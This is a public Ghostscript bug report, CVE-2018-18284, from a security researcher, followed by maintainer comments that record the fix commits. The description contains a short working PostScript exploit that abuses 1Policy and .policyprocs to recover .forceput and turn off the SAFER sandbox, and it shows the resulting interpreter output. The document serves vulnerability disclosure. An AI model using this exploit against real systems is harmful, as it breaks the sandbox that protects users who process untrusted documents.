Bug 699963

Summary: 1Policy is a dangerous operator, any callers should be odef
Product: Ghostscript Reporter: Tavis Ormandy <taviso>
Component: Security (public)Assignee: Ken Sharp <ken.sharp>
Status: RESOLVED FIXED    
Severity: normal CC: cbuissar
Priority: P4    
Version: unspecified   
Hardware: PC   
OS: Linux   
Customer: Word Size: ---

Description Tavis Ormandy 2018-10-12 21:47:39 UTC 
1Policy (from gs_setpd.ps) is basically a wrapper around .forceput, and therefore any callers need to be pseudo-operators.

Exploit:

/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def

GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

See bug 699816 for a full forceput exploit.
Comment 1 Tavis Ormandy 2018-10-13 00:28:10 UTC 
This is CVE-2018-18284
Comment 2 Ken Sharp 2018-10-15 10:29:31 UTC 
I have a fix but I want Chris to review it, so it'll be tomorrow before it gets applied, assuming Chris is happy with the change.
Comment 3 Ken Sharp 2018-10-16 08:35:38 UTC 
Fixed in commit 30cd347f37bfb293ffdc407397d1023628400b81
Comment 4 Ken Sharp 2018-10-16 08:36:45 UTC 
Oops :-( Wrong way round. This one is fixed with *this* commit 8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b